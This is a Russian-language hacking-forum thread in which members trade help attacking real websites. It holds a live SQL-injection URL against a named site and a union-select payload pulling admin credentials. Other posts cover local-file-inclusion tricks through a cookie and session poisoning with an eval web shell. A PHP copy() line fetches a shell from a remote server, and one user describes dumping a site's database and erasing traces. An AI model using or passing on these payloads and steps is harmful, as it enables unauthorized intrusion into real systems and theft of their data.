Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Code:
    http://biz.podolsk.ru/picturebrowse.php?catid=15+and+mid(version(),1,1)=5--+-
    Version: 5.1.60
     
  2. cipa21

    cipa21 Elder - Старейшина

    Joined:
    9 Apr 2009
    Messages:
    548
    Likes Received:
    146
    Reputations:
    30
    -146+union+/*!select*/+1,2,(/*!select+admin+from+admins*/),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22

    Вместо конструкции select+admin+from+admins можно подставить UPDATE запрос? А то что-то у меня не выходит?
     
  3. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    нельзя
     
    _________________________
    1 person likes this.
  4. package

    package New Member

    Joined:
    1 Aug 2012
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    SELECT g.id FROM categories g LEFT JOIN msk.categories l ON g.id=l.id WHERE (g.spr_sel_super>0 OR l.sel_super>0) AND g.spr_visible=1 AND l.visible=1 ORDER BY IF(g.spr_sel_super>0, g.spr_sel_super, l.sel_super) DESC, RAND() LIMIT [SQL]

    Как можно заюзать?
    я всю голову сломал

    Обычный union не берет вроде o_O
     
  5. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    В LIMIT Sql injection не раскрутите
     
  6. package

    package New Member

    Joined:
    1 Aug 2012
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    В смысле второй?

    я могу же и LIMIT 1 и LIMIT 1,1
     
  7. Teratex

    Teratex New Member

    Joined:
    13 Mar 2012
    Messages:
    28
    Likes Received:
    3
    Reputations:
    5
    Помогите советом.
    Есть LFI но в параметре кукисов.
    Логи не удалось найти, но можно подключать сессию.
    Первая проблема это какие варианты в сессию запихнуть шелл (типа CMD), пытался в имени вставить, вставляет, но в сессии строки нет.
    Хотел прочитать php файлы, но они выдаются уже исполненные. исходник не удается прочитать, может есть какие-то варианты?
     
  8. Zed0x

    Zed0x Member

    Joined:
    4 Jun 2012
    Messages:
    114
    Likes Received:
    29
    Reputations:
    23
    Для прочтение файлов php, попросту захексь их и всё. Дальше подключение найди к базе. :D
     
  9. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    917
    Likes Received:
    492
    Reputations:
    724
    /proc/self/environ - тоже не удалось найти?
     
    _________________________
  10. Teratex

    Teratex New Member

    Joined:
    13 Mar 2012
    Messages:
    28
    Likes Received:
    3
    Reputations:
    5
    VY_CMa
    Не читает, уже все возможные комбинации пробивал и логов и конфигов, нашел только настройки апача, в них указан путь логов, но почему-то не читает по этому пути, это загадка конечно почему.

    Zed0x
    Как именно это должно выглядеть?

    Пробовал так же:
    php://filter/convert.base64-encode/resource=/home/httpd/html/site.com/public_html/index.php
    Но так же не срабатывает, по каким именно причинам не знаю.
    Срабатывают инклюды только с %00
    Возможно это как-то связано именно с параметром куки? или разницы нет, что это переменная в урле, что куки?
     
  11. Teratex

    Teratex New Member

    Joined:
    13 Mar 2012
    Messages:
    28
    Likes Received:
    3
    Reputations:
    5
    Если так
    ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Fwww%2Fhtml%2Fsite.com%2Findex%2Ephp%00
    То так тоже выдает уже выполненный php
     
  12. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    выдает уже выполненный php, наверное потому что у тебя инклюд а не читалка.
    к логам и енвирону вполне вероятно нету прав на чтение.

    ищи то на что есть права
     
    _________________________
  13. Teratex

    Teratex New Member

    Joined:
    13 Mar 2012
    Messages:
    28
    Likes Received:
    3
    Reputations:
    5
    Expl0ited
    Да уже перепробовал все, вот только сессия доступна и FD но в них что-то никак немогу найти то что нужно в логах, они с запозданием туда попадают и почему-то разные извращения с <?php eval($_GET[cmd]); ?> не заносятся.

    Но вышло проще, форма заполнения профиля не фильтруется нифига, потому если вставить в имя например <?php phpinfo()?> и потом проинклюдить сессию, то видно результат выполнения phpinfo()
    Теперь я так понимаю мне нужно методом copy залить шелл в tmp, верно? а потом проинклюдить и нормально его разместить в системе....потому как не знаю какие права на запись есть у каких папок
     
    1 person likes this.
  14. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    <?php copy('http://сервер/твойшелл','/tmp/shell.txt');?>
    потом из кук инклюдишь /tmp/shell.txt
    ищешь диру и ты молодец.

    а вообще молодец, сам задал вопрос - сам ответил )
    побольше бы таких
     
    _________________________
  15. Teratex

    Teratex New Member

    Joined:
    13 Mar 2012
    Messages:
    28
    Likes Received:
    3
    Reputations:
    5
    Теперь другая проблема, шелл то заинклюдил в куки, но везде все надписи сереневым цветом.
    User: 48 ( apache ) Group: 48 ( apache )
    Cwd: u---------
    С таким развитием событий не сталкивался еще, директории никакие не видны, все на запись запрещено, как дальше двигаться?

    Хотя читать через и передвигаться вручную с помощью ChangeDir и ReadFile можно, но почему не работает шел в нормальном режиме...
     
    #20935 Teratex, 14 Aug 2012
    Last edited: 14 Aug 2012
  16. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Видимо у Вас Safe_mod, да и права говорят сами за за себя! Попробуй прочитать все возможные папки на чтение, бывали варианты, что можно прочитать соседа, а то и залиться к нему! Пробуйте, в общем!
     
  17. Teratex

    Teratex New Member

    Joined:
    13 Mar 2012
    Messages:
    28
    Likes Received:
    3
    Reputations:
    5
    cat1vo
    Заливался в разные папки, но все равно так же.
    сейф моуд стоит off

    Ну да ладно, и руками справился, нашел конфиги вручную, подключился базе, слил в доступную папку и скачал через сам сайт, ибо из шела даже скачать файлы нельзя, ну и потом же таким геморройным путем удалил дампы, через форму и инклюд)
     
  18. Teratex

    Teratex New Member

    Joined:
    13 Mar 2012
    Messages:
    28
    Likes Received:
    3
    Reputations:
    5
    Такой вопрос
    PHP хранит свои сессии в известных папках, tmp и.т.д
    А где хранятся сессии JSESSIONID, если стоит ява и Apache Tomcat?
     
  19. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    71
    Likes Received:
    6
    Reputations:
    -1
    помогите залить шелл в вордпресс, плагины и теми защищены от записи,
    WordPress 2.0.7
     
  20. Teratex

    Teratex New Member

    Joined:
    13 Mar 2012
    Messages:
    28
    Likes Received:
    3
    Reputations:
    5
    pirat0
    А заливать каким путем собираешься? через админку или есть локальный инклюд?
     
Thread Status:
Not open for further replies.